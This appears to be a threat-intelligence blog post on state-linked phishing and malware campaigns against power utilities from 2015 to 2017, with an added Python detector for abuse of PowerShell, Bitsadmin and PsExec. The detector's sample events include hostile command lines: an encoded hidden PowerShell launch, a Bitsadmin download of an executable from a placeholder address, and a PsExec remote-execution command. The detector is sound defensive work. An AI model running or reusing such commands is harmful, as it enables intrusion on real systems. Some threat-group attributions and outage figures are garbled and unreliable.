Last week, security analysts assessed that North Korea was likely actively probing South Korean and American utility companies during the month of September through a concerted, direct spearphishing campaign. While no direct breach of any utility occurred, phishing attempts are usually the first step of reconnaissance, luring the victim into downloading malicious code or malware; in this scenario the lure was a fake email invitation to a fundraiser that linked to the malware. This is not the first report of its kind: a similar report published only days earlier linked the Iranian group APT33 to attacks across the United States, Saudi Arabia, and South Korea that used email phishing and domain masquerading techniques against several aerospace and energy companies. This demonstrates a wide international distribution of threat actors actively engaged in cyberwarfare operations against western countries and their allies.

The first significant and well-known instance of a nationwide power grid being knocked offline was during the Ukraine-Russia conflict in December 2015. Russian cyber attackers (APT28/29, also referred to as Energetic Bear and Sandworm) successfully compromised the information systems of three energy distribution companies in Ukraine and temporarily disrupted the electricity supply to some 200,000 end consumers. A variety of utility companies across Ukraine were affected. The attack lasted for almost a 6 hour period, interrupting a total of up to 73 MWh of electricity, amounting to almost 95% of daily electricity consumption in Ukraine.

Tools used in the attack included an array of advanced persistent threat tooling: Black Energy 3, KillDisk, and a framework that Dragos, Inc. characterized as CRASHOVERRIDE.

Earlier this year, John MacWilliams, the first Chief Risk Officer for the Department of Energy (DOE), was quoted in an interview stating a consolidated US national power grid does not exist.

“Our electricity is supplied by a patchwork of not terribly innovative or imaginatively managed regional utilities. The federal government offers the only hope of a coordinated, intelligent response to threats to the system: there is no private-sector mechanism. To that end, the DOE had begun to gather the executives of the utility companies, to educate them about the threats they face.”

Reports of possible intrusions into the US power grid have been circulating over the last year. The first report surfaced in December 2016, out of Vermont, when Burlington Electric said in a statement that the company had detected malware code used in the Grizzly Steppe operation on a company laptop. It turned out the system was the laptop of a Burlington Electric employee, infected with the Neutrino malware (with no ties to Grizzly Steppe), and was not connected to Burlington’s network; the employee was merely logging into his personal Yahoo email account. The reporting was premature and blown out of context, as the threat was non-existent and the Russians were at no time targeting the electric company in Vermont. The Washington Post ended up retracting its report and online articles.

Nevertheless, the first US electric utility network intrusion is believed to have taken place earlier this year, in July 2017. Coincidentally, this cyber-attack was launched in Burlington, Kansas (not Vermont) against Wolf Creek Nuclear Operating Corp, a nuclear power station jointly owned by Kansas City Power & Light Co. (under Great Plains Energy), Westar Energy, and Kansas Electric Power Cooperative.

According to The NY Times, Wolf Creek officials said that while they could not comment on cyberattacks or security issues, no “operations systems” had been affected, and that their corporate network and the internet were separate from the network that runs the plant. This suggests the potential impact was limited to business and administrative networks, and that the purpose of the attack was reconnaissance: collecting network information to map the company’s digital footprint for future attacks, information that was not reachable from the compromised subnet alone.

Malware was distributed via social engineering and email spear phishing. The attackers wrote highly targeted phishing email messages containing fake résumés for control engineering jobs and sent them to senior industrial control engineers who maintain broad access to critical industrial control systems.

It appears the same phishing email attempt was also successfully launched against energy utilities in other parts of the world. For example, in July, Irish security experts suggested that Russian government hackers had tried to infiltrate the control systems of the Irish Republic’s power infrastructure by targeting senior engineers at the country’s Electricity Supply Board. These engineers were hit with a phishing email in June, which tried to trick them into downloading malicious software. There was no further report on whether any control systems of the power infrastructure were affected or on how the threat actors were determined to have originated from Russia. Similarly, Ireland’s EirGrid was also targeted in April 2017. Hackers, using IP addresses sourced in Ghana and Bulgaria, gained access to a Vodafone network used by the Irish operator EirGrid in the UK, installed a virtual wiretap on the system, then compromised the routers used by EirGrid in Wales and Northern Ireland.

Concurrent with the attacks on Irish utilities, hackers targeted Turkey’s Ministry of Energy and Natural Resources, minister Berat Albayrak confirmed, in an attempt to infiltrate the country’s power grid. There was no confirmation of whether the breach was successful. This was not the first time Turkey’s power grid had been digitally knocked offline. Unconfirmed, sporadic reporting in January 2017 accused the Americans of successfully launching cyberattacks against Turkey’s national power grid, knocking out power for almost 3 days in various parts of Turkey during bitter cold weather, in an attempt to destabilize the country and undermine the government.

In early September, Symantec published a report on cyberattacks targeting the “Western Energy sector”, affecting some 20 organizations across the US, 6 in Turkey, and one in Switzerland, and linking them to the cyber espionage group Dragonfly. Despite attempts to determine the names of the utilities affected, there is no detailed intelligence available at this time. Like previous Dragonfly campaigns and the attacks this summer against Wolf Creek and the Irish utilities, the hackers are using malicious email attachments (containing very specific content related to the energy sector), watering hole attacks, and trojanized software as initial attack vectors to gain access to a victim’s network.

There was no evidence of the group using any zero-day vulnerabilities against the target networks; instead, it strategically used publicly available administration tools such as PowerShell, PsExec, and Bitsadmin.
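Because the tools named above are legitimate administration utilities, a signature on the binaries themselves is useless; what a defender can watch for is the context in which they run. The following is an added example (not code from the page or from Symantec’s report) that applies a few such context rules to constructed, Sysmon-style process-creation records: an Office application spawning a shell, PowerShell launched with an encoded command, Bitsadmin pulling a file over HTTP, and PsExec invoked against a remote host. The host names, user names, paths, the 203.0.113.10 address and the encoded string are all constructed placeholders.

```python
import ntpath
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style).
# None of these hosts, users, paths or addresses are real.
SAMPLE_EVENTS = [
    {"host": "ws-eng-07", "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe resume.docx"},
    {"host": "ws-eng-07", "user": "CORP\\jdoe",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     # "QQBCAEMA" is a constructed placeholder, not a real payload
     "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA"},
    {"host": "ws-eng-07", "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high "
                "http://203.0.113.10/flashupdate.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe"},
    {"host": "ws-eng-07", "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Tools\\PsExec.exe",
     "cmdline": "PsExec.exe \\\\hmi-srv-01 -u CORP\\svc_ops -p ******** cmd.exe"},
    {"host": "srv-it-02", "user": "CORP\\admin.backup",
     "parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Matches the short and long forms of PowerShell's encoded-command switch.
ENCODED_SWITCH = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s")
# A UNC-style remote target such as \\hostname, as passed to PsExec.
UNC_TARGET = re.compile(r"\\\\[\w.-]+")


def _basename(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def classify_event(ev):
    """Return the names of every context rule this process-creation event matches."""
    image = _basename(ev["image"])
    parent = _basename(ev["parent"])
    cmd_lower = ev["cmdline"].lower()
    hits = []
    if parent in OFFICE_PARENTS and image in SHELLS:
        hits.append("office-spawned-shell")        # document lure launching a shell
    if image == "powershell.exe" and ENCODED_SWITCH.search(cmd_lower):
        hits.append("encoded-powershell")          # obfuscated command line
    if image == "bitsadmin.exe" and "/transfer" in cmd_lower and re.search(r"https?://", cmd_lower):
        hits.append("bitsadmin-download")          # built-in tool used as a downloader
    if image.startswith("psexec") and UNC_TARGET.search(ev["cmdline"]):
        hits.append("psexec-lateral")              # remote execution against another host
    return hits


def detect_lolbin_events(events):
    """Run every rule over a list of events and return one finding per rule hit."""
    findings = []
    for ev in events:
        for rule in classify_event(ev):
            findings.append({"rule": rule, "host": ev["host"],
                             "user": ev["user"], "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in detect_lolbin_events(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['cmdline']}")
```

The scheduled backup that runs PowerShell from a script file under services.exe produces no finding, which is the point of keying on parent process and command-line shape rather than on the binary name: the same rules would be tuned further in production by allow-listing known administrative hosts and accounts.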

The group uses a social engineering toolkit called Phishery, publicly available on GitHub, to perform email-based attacks that use a Word template injection attack to steal victims’ credentials.

The malware campaign involves infecting the compromised network with multiple remote access trojans masquerading as Flash updates (Backdoor.Goodor, Backdoor.Dorshel and Trojan.Karagany.B), providing remote access to the victim’s machine. Other Trojans Dragonfly used in this attack include Trojan.Heriplor (Oldrea stage II) and Trojan.Listrix (Karagany stage II). The installed backdoors facilitate intelligence collection on the network, including the use of a rather sophisticated naming nomenclature for screen captures.

[Figure: Screen capture of the Phishery install]

It is unclear whether the attacks reported in 2016, in July, and in September are separate, unrelated incidents by unaffiliated threat actors or whether a global, concerted, multinational, multi-staged cyber campaign against the utility sector is in progress. For years, Iran and North Korea have been known to collaborate and share ballistic missile technologies and could easily co-develop cyber tools. Further, North Korea could simply be reusing code that is readily available and in circulation across the darknet from other operations conducted by elements of the Russian government and Eastern European cybercriminals.

The Symantec report in September intentionally removed any direct reference to energy utility names, as the group has now demonstrated the ability to sabotage or gain control of industrial control systems should it decide to do so. Many utilities rely on internet-connected control systems, some of which are Bluetooth compatible. Across darknet forums and chatrooms, our intelligence analysts have witnessed an increased number of requests for information on, or code related to, Blueborne-associated malware, in light of Armis Labs’ report covering 8 zero-day vulnerabilities in the Bluetooth short-range wireless communication protocol that impact more than 5.3 Billion devices—from Android, iOS, Windows and Linux to Internet of Things (IoT) devices. The issues range from information leak vulnerabilities to remote code execution.